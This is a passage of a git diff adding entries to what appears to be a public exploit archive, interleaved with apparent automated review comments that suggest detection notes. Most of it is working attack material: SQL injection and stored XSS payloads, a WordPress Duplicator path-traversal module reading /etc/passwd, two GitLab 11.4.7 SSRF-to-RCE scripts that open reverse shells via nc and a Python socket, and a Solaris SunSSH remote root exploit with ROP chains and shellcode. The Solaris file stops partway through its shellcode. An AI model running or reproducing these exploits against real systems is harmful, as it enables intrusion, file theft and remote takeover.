+"Course List" page, your stored XSS payload will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49287.txt b/exploits/php/webapps/49287.txt
new file mode 100644
index 000000000..7670d6c7c
--- /dev/null
+++ b/exploits/php/webapps/49287.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Alumni Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Aakash Madaan
+# Date: 2020-12-17
+# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "Events" page.
+
+Step 3. Choose any event and select "view" or "edit". The url should be "
+http://localhost/index.php?page=view_event&id=2" or "
+http://localhost/admin/index.php?page=manage_event&id=1"
+
+Step 4. Capture the request to the "view" or "edit" event page in burpsuite.
+
+Step 5. Save the captured request and run sqlmap on it using "sqlmap -r
+request --time-sec=5 --dbs
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: page=edit_student&id=(SELECT (CASE WHEN (6191=6191) THEN 3
+ELSE (SELECT 5620 UNION SELECT 3605) END))
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=edit_student&id=3 AND (SELECT 7847 FROM
+(SELECT(SLEEP(5)))LQiE)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 9 columns
+    Payload: page=edit_student&id=-4840 UNION ALL SELECT
+NULL,CONCAT(0x717a7a7171,0x7152494c444964626e63466c66734573495771697a566862414e6c6f786e6d54566c6549484f6967,0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+-
+---
+
+Step 6. Sqlmap should inject the web-app successfully which leads to
+information disclosure
\ No newline at end of file
diff --git a/exploits/php/webapps/49288.rb b/exploits/php/webapps/49288.rb
new file mode 100755
index 000000000..4e0b49df5
--- /dev/null
+++ b/exploits/php/webapps/49288.rb
@@ -0,0 +1,64 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+    include Msf::Auxiliary::Report
+    include Msf::Exploit::Remote::HTTP::Wordpress
+    include Msf::Auxiliary::Scanner
+      def initialize(info = {})
+      super(update_info(info,
+                        'Name' => 'WordPress Duplicator File Read Vulnerability',
+                        'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.},
+                        'References' =>
+                          [
+                            ['CVE', '2020-11738'],
+                            ['WPVDB', '10078'],
+                            ['URL', 'https://snapcreek.com/duplicator/docs/changelog']
+                          ],
+                        'Author' =>
+                          [
+                            'Ramuel Gall', # Vulnerability discovery
+                            'Hoa Nguyen - SunCSR Team' # Metasploit module
+                          ],
+                        'DisclosureDate' => 'Feb 19 2020',
+                        'License' => MSF_LICENSE
+              ))
+        register_options(
+        [
+          OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+          OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
+        ])
+    end
+      def check
+      check_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24')
+    end
+      def run_host(ip)
+      traversal = '../' * datastore['DEPTH']
+      filename = datastore['FILEPATH']
+      filename = filename[1, filename.length] if filename =~ /^\//
+        res = send_request_cgi({
+                               'method' => 'GET',
+                               'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'),
+                               'vars_get' =>
+                                 {
+                                   'action' => 'duplicator_download',
+                                   'file' => "#{traversal}#{filename}"
+                                 }
+                             })
+        fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
+      fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+        print_status('Downloading file...')
+      print_line("\n#{res.body}\n")
+        fname = datastore['FILEPATH']
+        path = store_loot(
+        'duplicator.traversal',
+        'text/plain',
+        ip,
+        res.body,
+        fname
+      )
+      print_good("File saved in: #{path}")
+    end
+  end
\ No newline at end of file
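Review bot: The module has no comment telling a defender what the request looks like or which release closes the hole, although both can be read from the code: `run_host` sends a GET to `wp-admin/admin-ajax.php` with `action=duplicator_download` and a `file` value that begins with repeated `../`, and `check` passes 1.3.27 as the fixed version with 1.3.24 as the first affected one. A short comment above `initialize` would do, e.g. `# Detection: admin-ajax.php requests with action=duplicator_download whose file parameter contains '../'; fixed in Duplicator 1.3.27.` The `'Description'` string also reads "plugin 'Duplicator' plugin", which is worth tidying while the header is being edited.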
diff --git a/exploits/php/webapps/49290.txt b/exploits/php/webapps/49290.txt
new file mode 100644
index 000000000..ac103321f
--- /dev/null
+++ b/exploits/php/webapps/49290.txt
@@ -0,0 +1,18 @@
+# Exploit Title:  Smart Hospital 3.1 - "Add Patient" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-18
+# Vendor Homepage: https://smart-hospital.in/index.html
+# Software Link: https://codecanyon.net/item/smart-hospital-hospital-management-system/23205038
+# Affected Version: Version 3.1
+# Tested on: Kali Linux
+
+Step 1. Login to the application with Super Admin credentials
+
+Step 2. Click on "OPD-Out Patient" and then click on "Add Patient" then
+select "Add Patient" Again.
+
+Step 3. Insert payload - "><svg/onmouseover=alert(1)> ,  in Name , Guardian
+Name  , Email , Address , Remarks and Any Known Allergies and Save it.
+
+Step 4. Now the patient profile will open , when your course will move
+around profile details they will show an alert box.
\ No newline at end of file
diff --git a/exploits/php/webapps/49292.txt b/exploits/php/webapps/49292.txt
new file mode 100644
index 000000000..fbc5b2538
--- /dev/null
+++ b/exploits/php/webapps/49292.txt
@@ -0,0 +1,17 @@
+# Exploit Title:  Xeroneit Library Management System 3.1 - "Add Book Category " Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-18
+# Vendor Homepage: https://xeroneit.net/
+# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
+# Affected Version: Version 3.1
+# Tested on: Kali Linux
+
+Step 1. Login to the application as Admin.
+
+Step 2. Select "Book" from menu and click on "Book Category" . Now , click
+on "Add" Button.
+
+Step 3. Insert payload - "><img src onerror=alert(1)> ,  in "Category Name"
+and Save it.
+
+Step 4. Now you will see an alert box .
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49257.py b/exploits/ruby/webapps/49257.py
new file mode 100755
index 000000000..e44dae0c7
--- /dev/null
+++ b/exploits/ruby/webapps/49257.py
@@ -0,0 +1,64 @@
+# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
+# Date: 14-12-2020
+# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
+# Vendor Homepage: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested On: Debian 10 + Apache/2.4.46 (Debian)
+# Version: 11.4.7 community
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+
+# Sign in GitLab 11.4.7  portal and get (using Burp or something other):
+# authenticity_token
+# authenticated cookies
+# username
+# specify localport and localip for reverse shell
+
+username='aaaaaaaaaaaa'
+authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
+cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
+localport='1234'
+localip='192.168.0.114'
+
+
+url = "http://192.168.0.130:5080"
+proxies = { "http": "http://localhost:8080" }
+
+
+def deb(str):
+    print("Debug => "+str)
+
+def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
+    return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
+
+import string
+def random_string(length):
+    return ''.join(random.choice(string.ascii_letters) for m in range(length))
+
+def init(username,cookie,authenticity_token,localport,localip):
+    from bs4 import BeautifulSoup
+    import re
+    import urllib.parse
+    deb("Token: "+authenticity_token)
+    deb("Cookie: "+cookie)
+    session=requests.Session()
+    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
+    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
+    soup = BeautifulSoup(r.content,"lxml")
+    nsid = soup.findAll('input', {"id": "project_namespace_id"})
+    namespace_id=nsid[0]['value'];
+    deb("Namespace ID: "+namespace_id)
+    prgname=random_string(8)
+    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
+    newpayload=urllib.parse.urlencode(newpayload)
+    deb("Payload encoded: "+newpayload)
+    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
+    os.system("nc -nvlp "+localport)
+
+init(username,cookie,authenticity_token,localport,localip)
\ No newline at end of file
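Review bot: The module-level assignments `authenticity_token='jpT/…'` and `cookie = '_gitlab_session=c9425…'` commit what look like a real CSRF token and session cookie, and `init` then echoes both through `deb("Token: "+authenticity_token)` and `deb("Cookie: "+cookie)`. I would replace the literals with labelled placeholders, e.g. `cookie = '_gitlab_session=<session id>'`, and drop the two debug prints so the values do not end up in terminal logs or shell history captures. Two smaller points in the same hunk: the parameter name in `def deb(str)` shadows the builtin `str`, and `proxies` is assigned but never passed to a request.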
diff --git a/exploits/ruby/webapps/49263.py b/exploits/ruby/webapps/49263.py
new file mode 100755
index 000000000..792c682a8
--- /dev/null
+++ b/exploits/ruby/webapps/49263.py
@@ -0,0 +1,262 @@
+# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
+# Date: 15th December 2020
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
+# Software Link: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested on: GitLab 11.4.7 CE
+# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
+
+import requests
+import re
+import warnings
+from bs4 import BeautifulSoup
+import sys
+import base64
+import urllib
+from random_words import RandomWords
+import argparse
+import os
+import time
+
+
+
+
+parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
+parser.add_argument('-U',help='GitLab Username')
+parser.add_argument('-P',help='Gitlab Password')
+parser.add_argument('-l',help='rev shell lhost')
+parser.add_argument('-p',help='rev shell lport ',type=int)
+args = parser.parse_args()
+
+
+username = args.U
+password = args.P
+lhost = args.l
+lport = args.p
+
+
+#Retrieve CSRF Token
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+gitlab_url = "http://10.129.49.62:5080"
+request = requests.Session()
+print("[+] Retrieving CSRF token to submit the login form")
+time.sleep(1)
+page = request.get(gitlab_url+"/users/sign_in")
+html_content = page.text
+soup = BeautifulSoup(html_content,features="lxml")
+token = soup.findAll('meta')[16].get("content")
+
+
+print("[+] CSRF Token : "+token)
+time.sleep(1)
+
+
+#Login
+
+login_info ={
+            "authenticity_token": token,
+            "user[login]": username,
+            "user[password]": password,
+            "user[remember_me]": "0"
+}
+
+
+login_request = request.post(gitlab_url+"/users/sign_in",login_info)
+
+
+if login_request.status_code==200:
+	print("[+] Login Successful")
+	time.sleep(1)
+
+else:
+
+	print("Login Failed")
+	print(" ")
+	sys.exit()
+
+
+
+
+#Exploitation
+
+print("[+] Running Exploit")
+time.sleep(1)
+print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
+time.sleep(1)
+
+ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
+
+
+r = RandomWords()
+project_name = r.random_word()
+project_url = '%s/%s/'%(gitlab_url,username)
+
+print("[+] Creating Project")
+time.sleep(1)
+print("[+] Project Name : "+project_name)
+time.sleep(1)
+
+print("[+] Creating Python Reverse Shell")
+time.sleep(1)
+
+
+python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
+
+
+os.system("touch shell.py")
+shell_file = open("shell.py","w")
+shell_file.write(python_shell)
+shell_file.close()
+
+
+print("[+] Reverse Shell Generated")
+time.sleep(1)
+
+print("[+] Start HTTP Server in current directory")
+
+
+print("Command : python3 -m http.server 80")
+time.sleep(2)
+
+http_server = raw_input("Continue (Y/N) : ")
+
+if (http_server=="N") or (http_server=="n"):
+	print("Start HTTP Server before running exploit")
+
+elif (http_server=="Y") or (http_server=="y"):
+
+	
+	
+	print("Run this script twice with options below to get SHELL!")
+	print("")
+	print("Option 1 : Download shell.py rev shell to server using wget")
+	print("Option 2 : Execute shell.py downloaded previously")
+
+	option = raw_input("Option (1/2) : ")
+
+
+	if option=="1":
+
+
+
+		reverse_shell= """\nmulti
+		 sadd resque:gitlab:queues system_hook_push
+		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
+		 exec
+		 exec
+		 exec\n""" %(lhost)
+		 
+		 
+		project_page = request.get(gitlab_url+"/projects/new")
+		html_content = project_page.text
+		soup = BeautifulSoup(html_content,features="lxml")
+		project_token = soup.findAll('meta')[16].get("content")
+		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
+		urlencoded_token1 = project_token.replace("==","%3D%3D")
+		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
+		
+
+		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
+
+
+
+
+
+
+		proxies = {
+			"http" : "http://127.0.0.1:8080",
+		     	"https" : "https://127.0.0.1:8080",
+			    }
+			    
+		cookies = {
+		    'sidebar_collapsed': 'false',
+		    'event_filter': 'all',
+		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+		    '_gitlab_session':request.cookies['_gitlab_session'],
+		}
+
+		headers = {
+		    'Host': '10.129.49.31:5080',
+		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		    'Accept-Language': 'en-US,en;q=0.5',
+		    'Accept-Encoding': 'gzip, deflate',
+		    'Referer': 'http://10.129.49.31:5080/projects',
+		    'Content-Type': 'application/x-www-form-urlencoded',
+		    'Content-Length': '398',
+		    'Connection': 'close',
+		    'Upgrade-Insecure-Requests': '1',
+		}
+
+
+
+		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
+
+		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
+		print("[+] Success!")
+		time.sleep(1)
+		print("[+] Run Exploit with Option 2")
+		
+		
+	elif option=="2":
+
+		reverse_shell= """\nmulti
+		 sadd resque:gitlab:queues system_hook_push
+		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
+		 exec
+		 exec
+		 exec\n"""
+		 
+
+
+
+		project_page = request.get(gitlab_url+"/projects/new")
+		html_content = project_page.text
+		soup = BeautifulSoup(html_content,features="lxml")
+		project_token = soup.findAll('meta')[16].get("content")
+		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
+		urlencoded_token1 = project_token.replace("==","%3D%3D")
+		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
+
+
+		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
+
+
+
+
+
+
+		proxies = {
+			"http" : "http://127.0.0.1:8080",
+		     	"https" : "https://127.0.0.1:8080",
+			    }
+			    
+		cookies = {
+		    'sidebar_collapsed': 'false',
+		    'event_filter': 'all',
+		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+		    '_gitlab_session':request.cookies['_gitlab_session'],
+		}
+
+		headers = {
+		    'Host': '10.129.49.31:5080',
+		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		    'Accept-Language': 'en-US,en;q=0.5',
+		    'Accept-Encoding': 'gzip, deflate',
+		    'Referer': 'http://10.129.49.31:5080/projects',
+		    'Content-Type': 'application/x-www-form-urlencoded',
+		    'Content-Length': '398',
+		    'Connection': 'close',
+		    'Upgrade-Insecure-Requests': '1',
+		}
+
+
+
+		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
+
+		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
+		print("[+] Success!")
+		time.sleep(1)
+		print("[+] Spawning Reverse Shell")
\ No newline at end of file
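Review bot: The header cites CVE-2018-19571 and CVE-2018-19585 but gives a defender nothing to act on, even though the indicator is visible in the code: a POST to `/projects` whose `project[import_url]` uses the IPv4-mapped IPv6 loopback form `git://[0:0:0:0:0:ffff:127.0.0.1]:6379/` followed by newline-separated Redis commands. I would add a header comment along the lines of `# Detection: project creation with an import_url that resolves to loopback or contains CR/LF; Mitigation: upgrade from 11.4.7 to a release that fixes both CVEs.` The same applies to 49257.py in this commit, which builds the same `import_url` in `create_payload`. The script also leaves lab addresses inconsistent (`gitlab_url` is 10.129.49.62 while `headers` hard-codes 10.129.49.31), so a comment marking every such value as a placeholder would help readers.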
diff --git a/exploits/solaris/remote/49261.c b/exploits/solaris/remote/49261.c
new file mode 100644
index 000000000..404c67bbe
--- /dev/null
+++ b/exploits/solaris/remote/49261.c
@@ -0,0 +1,592 @@
+# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root 
+# Exploit Author: Hacker Fantastic
+# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
+# Version: 11
+# Tested on: SunOS solaris 5.11 11.0
+
+/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
+ * ====================================================================
+ * Makefile
+ * all: hfsunsshdx
+ *
+ *	hfsunsshdx: main.c
+ *	gcc main.c -o hfsunsshdx -lssh2 
+ *
+ *	clean:
+ *	rm -rf hfsunsshdx
+ *	rm -rf core.*
+ *
+ * A trivial to reach stack-based buffer overflow is present in libpam on
+ * Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
+ * which allocates a fixed size buffer of 512 bytes on the stack and parses
+ * usernames into the buffer via modules (authtok_get) without bounds checks.
+ * This issue can be reached remotely pre-authentication via SunSSH when
+ * "keyboard-interactive" is enabled to use PAM based authentication. The
+ * vulnerability was discovered being actively exploited by FireEye in the
+ * wild and is part of an APT toolkit called "EVILSUN". The vulnerability
+ * is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
+ * This exploit uses ROP gadgets to disable nxstack through mprotect on x86
+ * and a helper shellcode stub. The configuration in a default Solaris 
+ * install is vulnerable. The exploit makes use of libssh2 and tested on
+ * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable 
+ * SunSSH implementation and versions later than 11.1 have updated SunSSH
+ * code that prevents the issue being triggered.
+ *
+ * e.g.
+ *  ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
+ *  [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
+ *  [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
+ *  [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
+ *  [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
+ *  [+] entering keyboard-interactive authentication.
+ *  [-] number of prompts: 1
+ *  [-] prompt 0 from server: 'Please enter user name: '
+ *  [-] shellcode length 193 bytes
+ *  [-] rop chain length 68
+ *  [-] exploit buffer length 580
+ *  [-] sending exploit magic buffer... wait
+ *  [+] exploit success, handling payload...
+ *  [-] connected.. enjoy :)
+ *  SunOS solaris 5.11 11.0 i86pc i386 i86pc
+ *   6:49pm  up 53 min(s),  1 user,  load average: 0.01, 0.01, 0.01
+ *  helpdesk   console      Nov 27 17:57
+ *  uid=0(root) gid=0(root)
+ *
+ * -- Hacker Fantastic (https://hacker.house)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <ctype.h>
+#include <getopt.h>
+#include <time.h>
+#include <signal.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <sys/select.h>
+#include <arpa/inet.h>
+#include <sys/time.h>
+#include <libssh2.h>
+
+int sd = -1;
+int oldsd = -1;
+int ishell = -1;
+char* buf;
+char* payload;
+char* retaddr;
+struct sockaddr_in sain;
+
+struct target {
+	char* name;
+	char* ropchain;
+};
+
+struct shellcode {
+	char* name;
+	char* shellcode;
+};
+
+void spawn_shell(int);
+void bindshell_setup(short);
+void on_alarm(int);
+void on_interupt(int);
+void prepare_payload();
+
+const int targetno = 5;
+struct target targets[] = {
+	{"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
+	"\x41\x42\x43\x44"  // %ebx
+	"\x45\x46\x47\x48"  // %esi 
+	"\x50\x51\x52\x53"  // %ebp
+	"\xa7\x0e\x06\x08"  // pop %ecx, pop %edx, pop %ebp
+	"\x9c\x3e\x04\x08"  // ptr to (0x?, 0x?, 0x8044cf0, 0x7) 
+	"\x01\x01\x04\x08"  // %edx unused, must be writeable addr
+	"\x41\x42\x43\x44"  // %ebp unused var 
+	"\x93\xdb\xc8\xfe"  // pop %edx ; ret
+	"\x01\x30\x04\x08"  // ptr to 0x08043001 mprotect arg
+	"\x1a\xe7\x0b\xfe"  // dec %edx ; ret 
+	"\x79\x41\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
+	"\x93\xdb\xc8\xfe"  // pop %edx ; ret 
+	"\x01\x30\x04\x08"  // ptr to shellcode
+	"\xe0\xe8\x3e\xfe"  // mov $0x72,%al 
+	"\x64\x7c\xc3\xfe"  // inc %eax ; ret
+        "\x64\x7c\xc3\xfe"  // inc %eax ; ret	
+	"\x22\x9d\xd3\xfe"},// sysenter
+	{"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
+	"\x41\x42\x43\x44"  // %ebx overwrite unused
+	"\x41\x42\x43\x44"  // %esi overwrite unused
+	"\xf8\x32\x04\x08"  // %ebp overwrite unused
+	"\xb7\xf9\x05\x08"  // pop %ecx ; pop %edx ; pop %ebp ; ret
+	"\x7e\x36\x02\x04"  // ptr/2 to (0x?, 0x0, 0x1000, 0x7) 
+	"\x01\x30\x04\x08"  // ptr for %edx
+	"\x44\x43\x42\x41"  // ptr for %ebp unused
+	"\xe4\xd4\xde\xfe"  // dec %edx ; add %ecx, %ecx ; ret
+	"\x19\x42\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
+	"\xb8\xf9\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xeb\x30\x04\x08"  // shellcode ptr for %edx
+	"\x1c\x33\x04\x08"  // %ebp & used by "leave"
+        "\x84\x98\x51\xfe"  // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
+        "\x41\x42\x43\x44"  // %esi unused
+        "\xe0\x30\x04\x08"  // shellcode ptr to %ebx                              
+        "\xe8\x32\x04\x08"  // ptr into %ebp        
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret  
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
+        "\x11\x3f\xfe\xfe"  // sub $0x2,%eax ; ret
+	"\xfe\xf8\xcf\xfe"},// sysenter
+	{"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
+	"\xc3\x31\x04\x08"  // overwrite %ebp unused
+	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
+	"\x29\x28\x07\x08"  // pop %ebx ; ret
+	"\xf0\xff\xaf\xfe"  // 0x0a writen to address, unused gadget
+	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\x01\x30\x04\x08"  // %edx pointer to page
+	"\xb8\x31\x04\x08"  // unused %ebp value
+	"\xaa\x4c\x68\xfe"  // pop %ecx ; ret
+	"\xe0\x6e\x04\x08"  // ptr (0x?,0x0,0x1000,0x7)
+	"\x61\x22\x07\x08"  // dec %edx ; ret
+	"\x8b\x2d\xfe\xfe"  // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
+	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
+	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xc3\x31\x04\x08"  // shellcode addr for %edx
+	"\xc3\x31\x04\x08"  // unused %ebp value
+	"\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
+	{"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
+	"\xc3\x31\x04\x08"  // overwrite %ebp unused
+	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
+	"\xb1\x26\x07\x08"  // pop %ebx ; ret
+	"\xff\x01\xac\xfe"  // write garbage here, unused gadget
+	"\x98\xb9\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xff\x2f\x04\x08"  // %edx pointer to page
+	"\xc3\x31\x04\x08"  // unused %ebp value
+	"\x57\xaa\xe4\xfe"  // pop %ecx ; ret
+	"\x94\x11\x5f\xfe"  // ptr rwx (0x?,0x04b,0xe50,0x7)
+	"\xee\x6a\x65\xfe"  // inc %edx ; ret
+	"\x9b\xc5\xc1\xfe"  // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
+	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
+	"\x86\xae\xe5\xfe"  // pop %edx ; ret
+	"\xc3\x31\x04\x08"  // shellcode return address for %edx
+	"\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
+	{"Solaris all Sun_SSH_1.x.x debug crash target",
+	"\x41\x42\x43\x43"  // %ebp ptr
+	"\x78\x79\x80\x81"} // %eip ptr
+};
+
+const int shellno = 4;
+
+struct shellcode shellcodes[] = {
+	{"Solaris x86 bindshell tcp port 9999",
+	/* mprotect magic stub necessary for payloads expecting +x stack */
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
+	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
+	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
+	/* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
+	   ==================================================================
+		xorl %eax, %eax
+  		xorl %ecx, %ecx
+  		movl $0x08041001, %ebx
+  		movw $0x7001, %ax
+  		movb $0x7,%cl
+  		dec %ebx
+  		dec %eax
+  		pushl %ecx
+  		pushl %eax
+  		pushl %ebx
+  		pushl %ebx
+  		movl %esp, %ecx
+  		xorl %eax, %eax
+		movb $0x74, %al
+		int $0x91
+	*/
+	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
+	"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
+        "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
